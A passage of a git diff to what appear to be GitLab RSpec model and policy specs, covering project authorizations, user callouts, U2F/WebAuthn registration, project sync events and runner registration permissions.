do it 'returns true when replication slots are present' do expect(described_class).to receive(:exists?).and_return(true) @@ -73,28 +75,22 @@ RSpec.describe Postgresql::ReplicationSlot do before(:all) do skip('max_replication_slots too small') if skip_examples - @current_slot_count = ApplicationRecord + @current_slot_count = described_class .connection - .execute("SELECT COUNT(*) FROM pg_replication_slots;") - .first - .fetch('count') - .to_i + .select_value("SELECT COUNT(*) FROM pg_replication_slots") - @current_unused_count = ApplicationRecord + @current_unused_count = described_class .connection - .execute("SELECT COUNT(*) FROM pg_replication_slots WHERE active = 'f';") - .first - .fetch('count') - .to_i + .select_value("SELECT COUNT(*) FROM pg_replication_slots WHERE active = 'f';") - ApplicationRecord + described_class .connection .execute("SELECT * FROM pg_create_physical_replication_slot('test_slot');") end after(:all) do unless skip_examples - ApplicationRecord + described_class .connection .execute("SELECT pg_drop_replication_slot('test_slot');") end diff --git a/spec/models/preloaders/group_root_ancestor_preloader_spec.rb b/spec/models/preloaders/group_root_ancestor_preloader_spec.rb deleted file mode 100644 index 0d622e84ef1..00000000000 --- a/spec/models/preloaders/group_root_ancestor_preloader_spec.rb +++ /dev/null @@ -1,63 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Preloaders::GroupRootAncestorPreloader do - let_it_be(:user) { create(:user) } - let_it_be(:root_parent1) { create(:group, :private, name: 'root-1', path: 'root-1') } - let_it_be(:root_parent2) { create(:group, :private, name: 'root-2', path: 'root-2') } - let_it_be(:guest_group) { create(:group, name: 'public guest', path: 'public-guest') } - let_it_be(:private_maintainer_group) { create(:group, :private, name: 'b private maintainer', path: 'b-private-maintainer', parent: root_parent1) } - let_it_be(:private_developer_group) { create(:group, :private, 
project_creation_level: nil, name: 'c public developer', path: 'c-public-developer') } - let_it_be(:public_maintainer_group) { create(:group, :private, name: 'a public maintainer', path: 'a-public-maintainer', parent: root_parent2) } - - let(:root_query_regex) { /\ASELECT.+FROM "namespaces" WHERE "namespaces"."id" = \d+/ } - let(:additional_preloads) { [] } - let(:groups) { [guest_group, private_maintainer_group, private_developer_group, public_maintainer_group] } - let(:pristine_groups) { Group.where(id: groups) } - - shared_examples 'executes N matching DB queries' do |expected_query_count, query_method = nil| - it 'executes the specified root_ancestor queries' do - expect do - pristine_groups.each do |group| - root_ancestor = group.root_ancestor - - root_ancestor.public_send(query_method) if query_method.present? - end - end.to make_queries_matching(root_query_regex, expected_query_count) - end - - it 'strong_memoizes the correct root_ancestor' do - pristine_groups.each do |group| - expected_parent_id = group.root_ancestor.id == group.id ? 
nil : group.root_ancestor.id - - expect(group.parent_id).to eq(expected_parent_id) - end - end - end - - context 'when the preloader is used' do - before do - preload_ancestors - end - - context 'when no additional preloads are provided' do - it_behaves_like 'executes N matching DB queries', 0 - end - - context 'when additional preloads are provided' do - let(:additional_preloads) { [:route] } - let(:root_query_regex) { /\ASELECT.+FROM "routes" WHERE "routes"."source_id" = \d+/ } - - it_behaves_like 'executes N matching DB queries', 0, :full_path - end - end - - context 'when the preloader is not used' do - it_behaves_like 'executes N matching DB queries', 2 - end - - def preload_ancestors - described_class.new(pristine_groups, additional_preloads).execute - end -end diff --git a/spec/models/project_authorization_spec.rb b/spec/models/project_authorization_spec.rb index 58c0ff48b46..37da30fb54c 100644 --- a/spec/models/project_authorization_spec.rb +++ b/spec/models/project_authorization_spec.rb @@ -3,40 +3,59 @@ require 'spec_helper' RSpec.describe ProjectAuthorization do - let_it_be(:user) { create(:user) } - let_it_be(:project1) { create(:project) } - let_it_be(:project2) { create(:project) } - let_it_be(:project3) { create(:project) } + describe 'relations' do + it { is_expected.to belong_to(:user) } + it { is_expected.to belong_to(:project) } + end - describe '.insert_authorizations' do - it 'inserts the authorizations' do - described_class - .insert_authorizations([[user.id, project1.id, Gitlab::Access::MAINTAINER]]) + describe 'validations' do + it { is_expected.to validate_presence_of(:project) } + it { is_expected.to validate_presence_of(:user) } + it { is_expected.to validate_presence_of(:access_level) } + it { is_expected.to validate_inclusion_of(:access_level).in_array(Gitlab::Access.all_values) } + end - expect(user.project_authorizations.count).to eq(1) - end + describe '.insert_all' do + let_it_be(:user) { create(:user) } + let_it_be(:project_1) { 
create(:project) } + let_it_be(:project_2) { create(:project) } + let_it_be(:project_3) { create(:project) } - it 'inserts rows in batches' do - described_class.insert_authorizations([ - [user.id, project1.id, Gitlab::Access::MAINTAINER], - [user.id, project2.id, Gitlab::Access::MAINTAINER] - ], 1) + it 'skips duplicates and inserts the remaining rows without error' do + create(:project_authorization, user: user, project: project_1, access_level: Gitlab::Access::MAINTAINER) + + attributes = [ + { user_id: user.id, project_id: project_1.id, access_level: Gitlab::Access::MAINTAINER }, + { user_id: user.id, project_id: project_2.id, access_level: Gitlab::Access::MAINTAINER }, + { user_id: user.id, project_id: project_3.id, access_level: Gitlab::Access::MAINTAINER } + ] - expect(user.project_authorizations.count).to eq(2) + described_class.insert_all(attributes) + + expect(user.project_authorizations.pluck(:user_id, :project_id, :access_level)).to match_array(attributes.map(&:values)) end + end - it 'skips duplicates and inserts the remaining rows without error' do - create(:project_authorization, user: user, project: project1, access_level: Gitlab::Access::MAINTAINER) + describe '.insert_all_in_batches' do + let_it_be(:user) { create(:user) } + let_it_be(:project_1) { create(:project) } + let_it_be(:project_2) { create(:project) } + let_it_be(:project_3) { create(:project) } - rows = [ - [user.id, project1.id, Gitlab::Access::MAINTAINER], - [user.id, project2.id, Gitlab::Access::MAINTAINER], - [user.id, project3.id, Gitlab::Access::MAINTAINER] + let(:per_batch_size) { 2 } + + it 'inserts the rows in batches, as per the `per_batch` size' do + attributes = [ + { user_id: user.id, project_id: project_1.id, access_level: Gitlab::Access::MAINTAINER }, + { user_id: user.id, project_id: project_2.id, access_level: Gitlab::Access::MAINTAINER }, + { user_id: user.id, project_id: project_3.id, access_level: Gitlab::Access::MAINTAINER } ] - 
described_class.insert_authorizations(rows) + expect(described_class).to receive(:insert_all).twice.and_call_original + + described_class.insert_all_in_batches(attributes, per_batch_size) - expect(user.project_authorizations.pluck(:user_id, :project_id, :access_level)).to match_array(rows) + expect(user.project_authorizations.pluck(:user_id, :project_id, :access_level)).to match_array(attributes.map(&:values)) end end end diff --git a/spec/models/project_spec.rb b/spec/models/project_spec.rb index 3a8768ff463..4e38bf7d3e3 100644 --- a/spec/models/project_spec.rb +++ b/spec/models/project_spec.rb @@ -261,7 +261,49 @@ RSpec.describe Project, factory_default: :keep do end context 'updating a project' do - context 'with project namespaces' do + shared_examples 'project update' do + let_it_be(:project_namespace) { create(:project_namespace) } + let_it_be(:project) { project_namespace.project } + + context 'when project namespace is not set' do + before do + project.update_column(:project_namespace_id, nil) + project.reload + end + + it 'updates the project successfully' do + # pre-check that project does not have a project namespace + expect(project.project_namespace).to be_nil + + project.update!(path: 'hopefully-valid-path2') + + expect(project).to be_persisted + expect(project).to be_valid + expect(project.path).to eq('hopefully-valid-path2') + expect(project.project_namespace).to be_nil + end + end + + context 'when project has an associated project namespace' do + # when FF is disabled creating a project does not create a project_namespace, so we create one + it 'project is INVALID when trying to remove project namespace' do + project.reload + # check that project actually has an associated project namespace + expect(project.project_namespace_id).to eq(project_namespace.id) + + expect do + project.update!(project_namespace_id: nil, path: 'hopefully-valid-path1') + end.to raise_error(ActiveRecord::RecordInvalid) + expect(project).to be_invalid + 
expect(project.errors.full_messages).to include("Project namespace can't be blank") + expect(project.reload.project_namespace).to be_in_sync_with_project(project) + end + end + end + + context 'with create_project_namespace_on_project_create FF enabled' do + it_behaves_like 'project update' + it 'keeps project namespace in sync with project' do project = create(:project) project.update!(path: 'hopefully-valid-path1') @@ -270,19 +312,21 @@ RSpec.describe Project, factory_default: :keep do expect(project.project_namespace).to be_persisted expect(project.project_namespace).to be_in_sync_with_project(project) end + end - context 'with FF disabled' do - before do - stub_feature_flags(create_project_namespace_on_project_create: false) - end + context 'with create_project_namespace_on_project_create FF disabled' do + before do + stub_feature_flags(create_project_namespace_on_project_create: false) + end - it 'does not create a project namespace when project is updated' do - project = create(:project) - project.update!(path: 'hopefully-valid-path1') + it_behaves_like 'project update' - expect(project).to be_persisted - expect(project.project_namespace).to be_nil - end + it 'does not create a project namespace when project is updated' do + project = create(:project) + project.update!(path: 'hopefully-valid-path1') + + expect(project).to be_persisted + expect(project.project_namespace).to be_nil end end end @@ -807,6 +851,23 @@ RSpec.describe Project, factory_default: :keep do end end + describe '#remove_project_authorizations' do + let_it_be(:project) { create(:project) } + let_it_be(:user_1) { create(:user) } + let_it_be(:user_2) { create(:user) } + let_it_be(:user_3) { create(:user) } + + it 'removes the project authorizations of the specified users in the current project' do + create(:project_authorization, user: user_1, project: project) + create(:project_authorization, user: user_2, project: project) + create(:project_authorization, user: user_3, project: project) + + 
project.remove_project_authorizations([user_1.id, user_2.id]) + + expect(project.project_authorizations.pluck(:user_id)).not_to include(user_1.id, user_2.id) + end + end + describe 'reference methods' do let_it_be(:owner) { create(:user, name: 'Gitlab') } let_it_be(:namespace) { create(:namespace, name: 'Sample namespace', path: 'sample-namespace', owner: owner) } @@ -3520,6 +3581,29 @@ RSpec.describe Project, factory_default: :keep do expect(project.forks).to contain_exactly(forked_project) end end + + describe '#lfs_object_oids_from_fork_source' do + let_it_be(:lfs_object) { create(:lfs_object) } + let_it_be(:another_lfs_object) { create(:lfs_object) } + + let(:oids) { [lfs_object.oid, another_lfs_object.oid] } + + context 'when fork has one of two LFS objects' do + before do + create(:lfs_objects_project, lfs_object: lfs_object, project: project) + create(:lfs_objects_project, lfs_object: another_lfs_object, project: forked_project) + end + + it 'returns OIDs of owned LFS objects', :aggregate_failures do + expect(forked_project.lfs_objects_oids_from_fork_source(oids: oids)).to eq([lfs_object.oid]) + expect(forked_project.lfs_objects_oids(oids: oids)).to eq([another_lfs_object.oid]) + end + + it 'returns empty when project is not a fork' do + expect(project.lfs_objects_oids_from_fork_source(oids: oids)).to eq([]) + end + end + end end it_behaves_like 'can housekeep repository' do @@ -7392,6 +7476,83 @@ RSpec.describe Project, factory_default: :keep do end end + it_behaves_like 'it has loose foreign keys' do + let(:factory_name) { :project } + end + + context 'Projects::SyncEvent' do + let!(:project) { create(:project) } + + let_it_be(:new_namespace1) { create(:namespace) } + let_it_be(:new_namespace2) { create(:namespace) } + + context 'when creating the project' do + it 'creates a projects_sync_event record' do + expect(project.sync_events.count).to eq(1) + end + + it 'enqueues ProcessProjectSyncEventsWorker' do + expect(Projects::ProcessSyncEventsWorker).to 
receive(:perform_async) + + create(:project) + end + end + + context 'when updating project namespace_id' do + it 'creates a projects_sync_event record' do + expect do + project.update!(namespace_id: new_namespace1.id) + end.to change(Projects::SyncEvent, :count).by(1) + + expect(project.sync_events.count).to eq(2) + end + + it 'enqueues ProcessProjectSyncEventsWorker' do + expect(Projects::ProcessSyncEventsWorker).to receive(:perform_async) + + project.update!(namespace_id: new_namespace1.id) + end + end + + context 'when updating project other attribute' do + it 'creates a projects_sync_event record' do + expect do + project.update!(name: 'hello') + end.not_to change(Projects::SyncEvent, :count) + end + end + + context 'in the same transaction' do + context 'when updating different namespace_id' do + it 'creates two projects_sync_event records' do + expect do + Project.transaction do + project.update!(namespace_id: new_namespace1.id) + project.update!(namespace_id: new_namespace2.id) + end + end.to change(Projects::SyncEvent, :count).by(2) + + expect(project.sync_events.count).to eq(3) + end + end + + context 'when updating the same namespace_id' do + it 'creates one projects_sync_event record' do + expect do + Project.transaction do + project.update!(namespace_id: new_namespace1.id) + project.update!(namespace_id: new_namespace1.id) + end + end.to change(Projects::SyncEvent, :count).by(1) + + expect(project.sync_events.count).to eq(2) + end + end + end + end + + private + def finish_job(export_job) export_job.start export_job.finish diff --git a/spec/models/project_team_spec.rb b/spec/models/project_team_spec.rb index a6a56180ce1..c0bad96effc 100644 --- a/spec/models/project_team_spec.rb +++ b/spec/models/project_team_spec.rb @@ -237,7 +237,6 @@ RSpec.describe ProjectTeam do context 'when `tasks_to_be_done` and `tasks_project_id` are passed' do before do - stub_experiments(invite_members_for_task: true) project.team.add_users([user1], :developer, 
tasks_to_be_done: %w(ci code), tasks_project_id: project.id) end diff --git a/spec/models/repository_spec.rb b/spec/models/repository_spec.rb index d50c60774b4..96cbdb468aa 100644 --- a/spec/models/repository_spec.rb +++ b/spec/models/repository_spec.rb @@ -1679,6 +1679,16 @@ RSpec.describe Repository do expect(blobs.first.name).to eq('foobar') expect(blobs.size).to eq(1) end + + context 'when Gitaly returns NoRepository' do + before do + allow(repository.raw_repository).to receive(:batch_blobs).and_raise(Gitlab::Git::Repository::NoRepository) + end + + it 'returns empty array' do + expect(repository.blobs_at([%w[master foobar]])).to match_array([]) + end + end end describe '#root_ref' do diff --git a/spec/models/snippet_spec.rb b/spec/models/snippet_spec.rb index e24dd910c39..5d4a78bb15f 100644 --- a/spec/models/snippet_spec.rb +++ b/spec/models/snippet_spec.rb @@ -403,6 +403,51 @@ RSpec.describe Snippet do end end + describe '.find_by_project_title_trunc_created_at' do + let_it_be(:snippet) { create(:snippet) } + let_it_be(:created_at_without_ms) { snippet.created_at.change(usec: 0) } + + it 'returns a record if arguments match' do + result = described_class.find_by_project_title_trunc_created_at( + snippet.project, + snippet.title, + created_at_without_ms + ) + + expect(result).to eq(snippet) + end + + it 'returns nil if project does not match' do + result = described_class.find_by_project_title_trunc_created_at( + 'unmatched project', + snippet.title, + created_at_without_ms # to_s truncates ms of the argument + ) + + expect(result).to be(nil) + end + + it 'returns nil if title does not match' do + result = described_class.find_by_project_title_trunc_created_at( + snippet.project, + 'unmatched title', + created_at_without_ms # to_s truncates ms of the argument + ) + + expect(result).to be(nil) + end + + it 'returns nil if created_at does not match' do + result = described_class.find_by_project_title_trunc_created_at( + snippet.project, + snippet.title, + 
snippet.created_at # fails match by milliseconds + ) + + expect(result).to be(nil) + end + end + describe '#participants' do let_it_be(:project) { create(:project, :public) } let_it_be(:snippet) { create(:snippet, content: 'foo', project: project) } diff --git a/spec/models/terraform/state_version_spec.rb b/spec/models/terraform/state_version_spec.rb index ac2e8d167b3..7af9b7897ff 100644 --- a/spec/models/terraform/state_version_spec.rb +++ b/spec/models/terraform/state_version_spec.rb @@ -92,4 +92,9 @@ RSpec.describe Terraform::StateVersion do end end end + + it_behaves_like 'cleanup by a loose foreign key' do + let!(:model) { create(:terraform_state_version) } + let!(:parent) { model.build } + end end diff --git a/spec/models/timelog_spec.rb b/spec/models/timelog_spec.rb index d6c31307e30..f96d02e6a82 100644 --- a/spec/models/timelog_spec.rb +++ b/spec/models/timelog_spec.rb @@ -21,7 +21,7 @@ RSpec.describe Timelog do it { expect(subject.project_id).not_to be_nil } - describe 'Issuable validation' do + describe 'validation' do it 'is invalid if issue_id and merge_request_id are missing' do subject.attributes = { issue: nil, merge_request: nil } @@ -139,4 +139,14 @@ RSpec.describe Timelog do time + 1.day end end + + describe 'hooks' do + describe '.set_project' do + it 'populates project with issuable project' do + timelog = create(:issue_timelog, issue: issue) + + expect(timelog.project_id).to be(timelog.issue.project_id) + end + end + end end diff --git a/spec/models/u2f_registration_spec.rb b/spec/models/u2f_registration_spec.rb index 7a70cf69566..6bb9ccfcf35 100644 --- a/spec/models/u2f_registration_spec.rb +++ b/spec/models/u2f_registration_spec.rb @@ -20,9 +20,9 @@ RSpec.describe U2fRegistration do describe '#create_webauthn_registration' do shared_examples_for 'creates webauthn registration' do it 'creates webauthn registration' do - u2f_registration.save! 
+ created_record = u2f_registration - webauthn_registration = WebauthnRegistration.where(u2f_registration_id: u2f_registration.id) + webauthn_registration = WebauthnRegistration.where(u2f_registration_id: created_record.id) expect(webauthn_registration).to exist end end @@ -43,13 +43,16 @@ RSpec.describe U2fRegistration do it 'logs error' do allow(Gitlab::Auth::U2fWebauthnConverter).to receive(:new).and_raise('boom!') - expect(Gitlab::AppJsonLogger).to( - receive(:error).with(a_hash_including(event: 'u2f_migration', - error: 'RuntimeError', - message: 'U2F to WebAuthn conversion failed')) - ) - u2f_registration.save! + allow_next_instance_of(U2fRegistration) do |u2f_registration| + allow(u2f_registration).to receive(:id).and_return(123) + end + + expect(Gitlab::ErrorTracking).to( + receive(:track_exception).with(kind_of(StandardError), + u2f_registration_id: 123)) + + u2f_registration end end end diff --git a/spec/models/user_spec.rb b/spec/models/user_spec.rb index b5d4614d206..f8cea619233 100644 --- a/spec/models/user_spec.rb +++ b/spec/models/user_spec.rb @@ -110,8 +110,8 @@ RSpec.describe User do it { is_expected.to have_many(:spam_logs).dependent(:destroy) } it { is_expected.to have_many(:todos) } it { is_expected.to have_many(:award_emoji).dependent(:destroy) } - it { is_expected.to have_many(:builds).dependent(:nullify) } - it { is_expected.to have_many(:pipelines).dependent(:nullify) } + it { is_expected.to have_many(:builds) } + it { is_expected.to have_many(:pipelines) } it { is_expected.to have_many(:chat_names).dependent(:destroy) } it { is_expected.to have_many(:uploads) } it { is_expected.to have_many(:reported_abuse_reports).dependent(:destroy).class_name('AbuseReport') } @@ -124,7 +124,7 @@ RSpec.describe User do it { is_expected.to have_many(:created_custom_emoji).inverse_of(:creator) } it { is_expected.to have_many(:in_product_marketing_emails) } it { is_expected.to have_many(:timelogs) } - it { is_expected.to 
have_many(:callouts).class_name('UserCallout') } + it { is_expected.to have_many(:callouts).class_name('Users::Callout') } it { is_expected.to have_many(:group_callouts).class_name('Users::GroupCallout') } describe '#user_detail' do @@ -1080,6 +1080,16 @@ RSpec.describe User do end end + context 'strip attributes' do + context 'name' do + let(:user) { User.new(name: ' John Smith ') } + + it 'strips whitespaces on validation' do + expect { user.valid? }.to change { user.name }.to('John Smith') + end + end + end + describe 'Respond to' do it { is_expected.to respond_to(:admin?) } it { is_expected.to respond_to(:name) } @@ -1540,7 +1550,11 @@ RSpec.describe User do allow(user).to receive(:update_highest_role) end - expect(SecureRandom).to receive(:hex).and_return('3b8ca303') + allow_next_instance_of(Namespaces::UserNamespace) do |namespace| + allow(namespace).to receive(:schedule_sync_event_worker) + end + + expect(SecureRandom).to receive(:hex).with(no_args).and_return('3b8ca303') user = create(:user) @@ -1612,6 +1626,46 @@ RSpec.describe User do end end + describe 'enabled_static_object_token' do + let_it_be(:static_object_token) { 'ilqx6jm1u945macft4eff0nw' } + + it 'returns incoming email token when supported' do + allow(Gitlab::CurrentSettings).to receive(:static_objects_external_storage_enabled?).and_return(true) + + user = create(:user, static_object_token: static_object_token) + + expect(user.enabled_static_object_token).to eq(static_object_token) + end + + it 'returns `nil` when not supported' do + allow(Gitlab::CurrentSettings).to receive(:static_objects_external_storage_enabled?).and_return(false) + + user = create(:user, static_object_token: static_object_token) + + expect(user.enabled_static_object_token).to be_nil + end + end + + describe 'enabled_incoming_email_token' do + let_it_be(:incoming_email_token) { 'ilqx6jm1u945macft4eff0nw' } + + it 'returns incoming email token when supported' do + allow(Gitlab::IncomingEmail).to 
receive(:supports_issue_creation?).and_return(true) + + user = create(:user, incoming_email_token: incoming_email_token) + + expect(user.enabled_incoming_email_token).to eq(incoming_email_token) + end + + it 'returns `nil` when not supported' do + allow(Gitlab::IncomingEmail).to receive(:supports_issue_creation?).and_return(false) + + user = create(:user, incoming_email_token: incoming_email_token) + + expect(user.enabled_incoming_email_token).to be_nil + end + end + describe '#recently_sent_password_reset?' do it 'is false when reset_password_sent_at is nil' do user = build_stubbed(:user, reset_password_sent_at: nil) @@ -1726,6 +1780,52 @@ RSpec.describe User do end end + context 'two_factor_u2f_enabled?' do + let_it_be(:user) { create(:user, :two_factor) } + + context 'when webauthn feature flag is enabled' do + context 'user has no U2F registration' do + it { expect(user.two_factor_u2f_enabled?).to eq(false) } + end + + context 'user has existing U2F registration' do + it 'returns false' do + device = U2F::FakeU2F.new(FFaker::BaconIpsum.characters(5)) + create(:u2f_registration, name: 'my u2f device', + user: user, + certificate: Base64.strict_encode64(device.cert_raw), + key_handle: U2F.urlsafe_encode64(device.key_handle_raw), + public_key: Base64.strict_encode64(device.origin_public_key_raw)) + + expect(user.two_factor_u2f_enabled?).to eq(false) + end + end + end + + context 'when webauthn feature flag is disabled' do + before do + stub_feature_flags(webauthn: false) + end + + context 'user has no U2F registration' do + it { expect(user.two_factor_u2f_enabled?).to eq(false) } + end + + context 'user has existing U2F registration' do + it 'returns true' do + device = U2F::FakeU2F.new(FFaker::BaconIpsum.characters(5)) + create(:u2f_registration, name: 'my u2f device', + user: user, + certificate: Base64.strict_encode64(device.cert_raw), + key_handle: U2F.urlsafe_encode64(device.key_handle_raw), + public_key: Base64.strict_encode64(device.origin_public_key_raw)) 
+ + expect(user.two_factor_u2f_enabled?).to eq(true) + end + end + end + end + describe 'projects' do before do @user = create(:user) @@ -1856,15 +1956,31 @@ RSpec.describe User do end context 'when user has running CI pipelines' do - let(:service) { double } let(:pipelines) { build_list(:ci_pipeline, 3, :running) } - it 'aborts all running pipelines and related jobs' do + it 'drops all running pipelines and related jobs' do + drop_service = double + disable_service = double + expect(user).to receive(:pipelines).and_return(pipelines) - expect(Ci::DropPipelineService).to receive(:new).and_return(service) - expect(service).to receive(:execute_async_for_all).with(pipelines, :user_blocked, user) + expect(Ci::DropPipelineService).to receive(:new).and_return(drop_service) + expect(drop_service).to receive(:execute_async_for_all).with(pipelines, :user_blocked, user) - user.block + expect(Ci::DisableUserPipelineSchedulesService).to receive(:new).and_return(disable_service) + expect(disable_service).to receive(:execute).with(user) + + user.block! 
+ end + + it 'does not drop running pipelines if the transaction rolls back' do + expect(Ci::DropPipelineService).not_to receive(:new) + expect(Ci::DisableUserPipelineSchedulesService).not_to receive(:new) + + User.transaction do + user.block + + raise ActiveRecord::Rollback + end end end @@ -2540,26 +2656,18 @@ RSpec.describe User do end describe '.find_by_full_path' do - using RSpec::Parameterized::TableSyntax - - # TODO: this `where/when` can be removed in issue https://gitlab.com/gitlab-org/gitlab/-/issues/341070 - # At that point we only need to check `user_namespace` - where(namespace_type: [:namespace, :user_namespace]) + let!(:user) { create(:user, namespace: create(:user_namespace)) } - with_them do - let!(:user) { create(:user, namespace: create(namespace_type)) } - - context 'with a route matching the given path' do - let!(:route) { user.namespace.route } + context 'with a route matching the given path' do + let!(:route) { user.namespace.route } - it 'returns the user' do - expect(described_class.find_by_full_path(route.path)).to eq(user) - end + it 'returns the user' do + expect(described_class.find_by_full_path(route.path)).to eq(user) + end - it 'is case-insensitive' do - expect(described_class.find_by_full_path(route.path.upcase)).to eq(user) - expect(described_class.find_by_full_path(route.path.downcase)).to eq(user) - end + it 'is case-insensitive' do + expect(described_class.find_by_full_path(route.path.upcase)).to eq(user) + expect(described_class.find_by_full_path(route.path.downcase)).to eq(user) end context 'with a redirect route matching the given path' do @@ -3463,19 +3571,7 @@ RSpec.describe User do subject { user.membership_groups } - shared_examples 'returns groups where the user is a member' do - specify { is_expected.to contain_exactly(parent_group, child_group) } - end - - it_behaves_like 'returns groups where the user is a member' - - context 'when feature flag :linear_user_membership_groups is disabled' do - before do - 
stub_feature_flags(linear_user_membership_groups: false) - end - - it_behaves_like 'returns groups where the user is a member' - end + specify { is_expected.to contain_exactly(parent_group, child_group) } end describe '#authorizations_for_projects' do @@ -5543,7 +5639,7 @@ RSpec.describe User do describe '#dismissed_callout?' do let_it_be(:user, refind: true) { create(:user) } - let_it_be(:feature_name) { UserCallout.feature_names.each_key.first } + let_it_be(:feature_name) { Users::Callout.feature_names.each_key.first } context 'when no callout dismissal record exists' do it 'returns false when no ignore_dismissal_earlier_than provided' do @@ -5553,7 +5649,7 @@ RSpec.describe User do context 'when dismissed callout exists' do before_all do - create(:user_callout, user: user, feature_name: feature_name, dismissed_at: 4.months.ago) + create(:callout, user: user, feature_name: feature_name, dismissed_at: 4.months.ago) end it 'returns true when no ignore_dismissal_earlier_than provided' do @@ -5572,12 +5668,12 @@ RSpec.describe User do describe '#find_or_initialize_callout' do let_it_be(:user, refind: true) { create(:user) } - let_it_be(:feature_name) { UserCallout.feature_names.each_key.first } + let_it_be(:feature_name) { Users::Callout.feature_names.each_key.first } subject(:find_or_initialize_callout) { user.find_or_initialize_callout(feature_name) } context 'when callout exists' do - let!(:callout) { create(:user_callout, user: user, feature_name: feature_name) } + let!(:callout) { create(:callout, user: user, feature_name: feature_name) } it 'returns existing callout' do expect(find_or_initialize_callout).to eq(callout) @@ -5587,7 +5683,7 @@ RSpec.describe User do context 'when callout does not exist' do context 'when feature name is valid' do it 'initializes a new callout' do - expect(find_or_initialize_callout).to be_a_new(UserCallout) + expect(find_or_initialize_callout).to be_a_new(Users::Callout) end it 'is valid' do @@ -5599,7 +5695,7 @@ RSpec.describe 
User do let(:feature_name) { 'notvalid' } it 'initializes a new callout' do - expect(find_or_initialize_callout).to be_a_new(UserCallout) + expect(find_or_initialize_callout).to be_a_new(Users::Callout) end it 'is not valid' do @@ -6092,20 +6188,6 @@ RSpec.describe User do end end - describe '#default_dashboard?' do - it 'is the default dashboard' do - user = build(:user) - - expect(user.default_dashboard?).to be true - end - - it 'is not the default dashboard' do - user = build(:user, dashboard: 'stars') - - expect(user.default_dashboard?).to be false - end - end - describe '.dormant' do it 'returns dormant users' do freeze_time do @@ -6218,19 +6300,7 @@ RSpec.describe User do subject { user.send(:groups_with_developer_maintainer_project_access) } - shared_examples 'groups_with_developer_maintainer_project_access examples' do - specify { is_expected.to contain_exactly(developer_group2) } - end - - it_behaves_like 'groups_with_developer_maintainer_project_access examples' - - context 'when feature flag :linear_user_groups_with_developer_maintainer_project_access is disabled' do - before do - stub_feature_flags(linear_user_groups_with_developer_maintainer_project_access: false) - end - - it_behaves_like 'groups_with_developer_maintainer_project_access examples' - end + specify { is_expected.to contain_exactly(developer_group2) } end describe '.get_ids_by_username' do @@ -6269,4 +6339,8 @@ RSpec.describe User do expect(user.user_readme).to be(nil) end end + + it_behaves_like 'it has loose foreign keys' do + let(:factory_name) { :user } + end end diff --git a/spec/models/user_callout_spec.rb b/spec/models/users/callout_spec.rb index 5b36c8450ea..293f0279e79 100644 --- a/spec/models/user_callout_spec.rb +++ b/spec/models/users/callout_spec.rb @@ -2,8 +2,8 @@ require 'spec_helper' -RSpec.describe UserCallout do - let_it_be(:callout) { create(:user_callout) } +RSpec.describe Users::Callout do + let_it_be(:callout) { create(:callout) } it_behaves_like 'having unique enum 
values' diff --git a/spec/models/concerns/calloutable_spec.rb b/spec/models/users/calloutable_spec.rb index d847413de88..01603d8bbd6 100644 --- a/spec/models/concerns/calloutable_spec.rb +++ b/spec/models/users/calloutable_spec.rb @@ -2,8 +2,8 @@ require 'spec_helper' -RSpec.describe Calloutable do - subject { build(:user_callout) } +RSpec.describe Users::Calloutable do + subject { build(:callout) } describe "Associations" do it { is_expected.to belong_to(:user) } @@ -14,9 +14,9 @@ RSpec.describe Calloutable do end describe '#dismissed_after?' do - let(:some_feature_name) { UserCallout.feature_names.keys.second } - let(:callout_dismissed_month_ago) { create(:user_callout, feature_name: some_feature_name, dismissed_at: 1.month.ago )} - let(:callout_dismissed_day_ago) { create(:user_callout, feature_name: some_feature_name, dismissed_at: 1.day.ago )} + let(:some_feature_name) { Users::Callout.feature_names.keys.second } + let(:callout_dismissed_month_ago) { create(:callout, feature_name: some_feature_name, dismissed_at: 1.month.ago )} + let(:callout_dismissed_day_ago) { create(:callout, feature_name: some_feature_name, dismissed_at: 1.day.ago )} it 'returns whether a callout dismissed after specified date' do expect(callout_dismissed_month_ago.dismissed_after?(15.days.ago)).to eq(false) diff --git a/spec/models/work_item/type_spec.rb b/spec/models/work_item/type_spec.rb index dd5324d63a0..cc18558975b 100644 --- a/spec/models/work_item/type_spec.rb +++ b/spec/models/work_item/type_spec.rb @@ -19,10 +19,10 @@ RSpec.describe WorkItem::Type do it 'deletes type but not unrelated issues' do type = create(:work_item_type) - expect(WorkItem::Type.count).to eq(5) + expect(WorkItem::Type.count).to eq(6) expect { type.destroy! 
}.not_to change(Issue, :count) - expect(WorkItem::Type.count).to eq(4) + expect(WorkItem::Type.count).to eq(5) end end diff --git a/spec/policies/clusters/agents/activity_event_policy_spec.rb b/spec/policies/clusters/agents/activity_event_policy_spec.rb new file mode 100644 index 00000000000..1262fcfd9f2 --- /dev/null +++ b/spec/policies/clusters/agents/activity_event_policy_spec.rb @@ -0,0 +1,31 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Clusters::Agents::ActivityEventPolicy do + let_it_be(:event) { create(:agent_activity_event) } + + let(:user) { create(:user) } + let(:policy) { described_class.new(user, event) } + let(:project) { event.agent.project } + + describe 'rules' do + context 'developer' do + before do + project.add_developer(user) + end + + it { expect(policy).to be_disallowed :admin_cluster } + it { expect(policy).to be_disallowed :read_cluster } + end + + context 'maintainer' do + before do + project.add_maintainer(user) + end + + it { expect(policy).to be_allowed :admin_cluster } + it { expect(policy).to be_allowed :read_cluster } + end + end +end diff --git a/spec/policies/group_policy_spec.rb b/spec/policies/group_policy_spec.rb index fc4fbace790..7822ee2b92e 100644 --- a/spec/policies/group_policy_spec.rb +++ b/spec/policies/group_policy_spec.rb @@ -1033,6 +1033,86 @@ RSpec.describe GroupPolicy do end end + describe 'register_group_runners' do + shared_examples 'expected outcome based on runner registration control' do + context 'with runner_registration_control FF disabled' do + before do + stub_feature_flags(runner_registration_control: false) + end + + it { is_expected.to be_allowed(:register_group_runners) } + end + + context 'with runner_registration_control FF enabled' do + before do + stub_feature_flags(runner_registration_control: true) + end + + context 'with group runner registration disabled' do + before do + stub_application_setting(valid_runner_registrars: ['project']) + end + + it { is_expected.to 
